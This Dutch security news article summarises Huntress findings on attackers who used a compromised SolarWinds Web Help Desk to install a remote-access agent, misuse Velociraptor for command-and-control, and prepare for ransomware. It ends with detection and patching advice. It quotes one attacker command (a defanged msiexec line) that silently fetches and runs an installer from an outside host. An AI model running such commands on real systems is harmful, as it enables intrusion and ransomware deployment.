Aanvallers misbruiken SolarWinds-lek voor deployen ransomware
In dit artikel:
Beveiligingsonderzoekers van Huntress zagen afgelopen week actieve aanvallen die uitgaan van een gecompromitteerde SolarWinds Web Help Desk-installatie. De aanvallers misbruikten de WHD-service wrapper (wrapper.exe) om java.exe te starten, waarna via msiexec stil een externe MSI werd opgehaald (msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi). Die MSI leverde een legitieme Zoho RMM/Assist-agent die was ingesteld voor onbeheerde toegang en gekoppeld aan een ProtonMail-account.
Zodra de RMM-agent aanwezig was, was er hands-on-keyboard-activiteit: via het agentproces (TOOLSIQ.EXE) voerden de aanvallers Active Directory-verkenning uit om netwerkapparaten en accounts in kaart te brengen. Kort daarna werd Velociraptor (een open source digital-forensics/IR-tool) uitgerold vanaf een door de aanvaller beheerde Supabase-bucket. Hoewel Velociraptor bedoeld is als verdedigingstool, gebruikte de aanvaller het als command-and-control: remote commands en VQL-queries stelden hen in staat processen uit te voeren en data te verzamelen op afstand.
De gebruikte Velociraptor-release (0.73.4) is oud en bevat bekende privilege-escalatiezwaktes; de server-URL verwees via een Cloudflare Worker die in eerdere incidenten voorkwam (onder meer bij ToolShell-exploits en Warlock-ransomwarecampagnes). Nadat de agent als Windows-service draaide, voerden de aanvallers snel een reeks base64-gecodeerde (UTF-16LE) PowerShell-commando’s uit — precies het patroon dat Velociraptor hanteert voor remote uitvoering.
Opvallend was dat de aanvaller Elastic Cloud als slachtofferbeheer gebruikte: een PowerShell-script verzamelde uitgebreide systeeminformatie met Get-ComputerInfo, formatteerde die als NDJSON en pusht die naar een Elasticsearch-index via de Bulk API met een hardcoded API-sleutel. Hiermee bouwden de aanvallers feitelijk een eigen SIEM-dashboard (doorzoekbaar met Kibana) om geïnfecteerde hosts centraal te managen. Daarnaast werden Cloudflare-tunnels vanaf de officiële GitHub-releases geïnstalleerd voor extra toegangskanalen. Na het uitschakelen van beveiligingscontrole (via registerwijzigingen) werd nog een VS Code-binary gedownload van Supabase. De keten lijkt te eindigen met voorbereidingen voor ransomware-uitrol.
Aanbevelingen: controleer op ongeautoriseerde Zoho-accounts en RMM-agents, zoek naar Velociraptor-processen/servers en onverwachte Cloudflare-workers, roep Elastic API-activiteiten op ongebruikelijke indices na, en patch SolarWinds WHD en Velociraptor waar mogelijk. Overweeg ook netwerksegmentatie en strengere monitoring van msiexec-activiteit en externe MSI-downloads.